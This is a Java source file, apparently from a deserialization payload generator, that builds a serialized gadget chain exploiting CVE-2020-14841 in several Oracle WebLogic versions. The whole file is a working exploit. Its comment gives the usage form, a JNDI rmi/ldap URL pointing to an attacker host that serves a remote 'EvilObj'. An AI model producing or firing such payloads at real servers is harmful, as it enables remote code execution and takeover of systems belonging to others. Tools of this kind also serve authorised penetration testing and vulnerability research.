package payloads;

import com.sun.rowset.JdbcRowSetImpl;
import com.tangosol.util.comparator.ExtractorComparator;
import oracle.eclipselink.coherence.integrated.internal.cache.LockVersionExtractor;
import org.eclipse.persistence.internal.descriptors.MethodAttributeAccessor;
import common.Serializerable;
import payloads.annotation.Authors;
import payloads.annotation.Dependencies;
import util.PayloadRunner;
import util.Reflections;

import java.lang.reflect.Field;
import java.util.PriorityQueue;

// Command: rmi/ldap://xxxxxxx:xxx/EvilObj
// CVE-2020-14841

@SuppressWarnings({ "rawtypes", "unchecked" })
@Dependencies({"weblogic:10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, 14.1.1.0.0"})
@Authors({ Authors.CCKUAILONG })
public class Weblogic9 implements ObjectPayload<Object> {

	public byte[] getObject(final String command) throws Exception {
		JdbcRowSetImpl jdbcRowSet = new JdbcRowSetImpl();
		jdbcRowSet.setDataSourceName(command);

		MethodAttributeAccessor methodAttributeAccessor = new MethodAttributeAccessor();
		methodAttributeAccessor.setGetMethodName("getDatabaseMetaData");
		methodAttributeAccessor.setIsWriteOnly(true);
		methodAttributeAccessor.setAttributeName("UnicodeSec");


		LockVersionExtractor extractor = new LockVersionExtractor(methodAttributeAccessor, "UnicodeSec");

		final ExtractorComparator comparator = new ExtractorComparator(extractor);
		final PriorityQueue<Object> queue = new PriorityQueue<Object>(2, comparator);


		Object[] q = new Object[]{jdbcRowSet, jdbcRowSet};
		Reflections.setFieldValue(queue, "queue", q);
		Reflections.setFieldValue(queue, "size", 2);

		Field comparatorF = queue.getClass().getDeclaredField("comparator");
		comparatorF.setAccessible(true);
		comparatorF.set(queue, new ExtractorComparator(extractor));

		return Serializerable.serialize(queue);
	}

	public static byte[] getBytes(final String command, Boolean fusion) throws Exception {
		return Weblogic9.class.newInstance().getObject(command);
	}

}
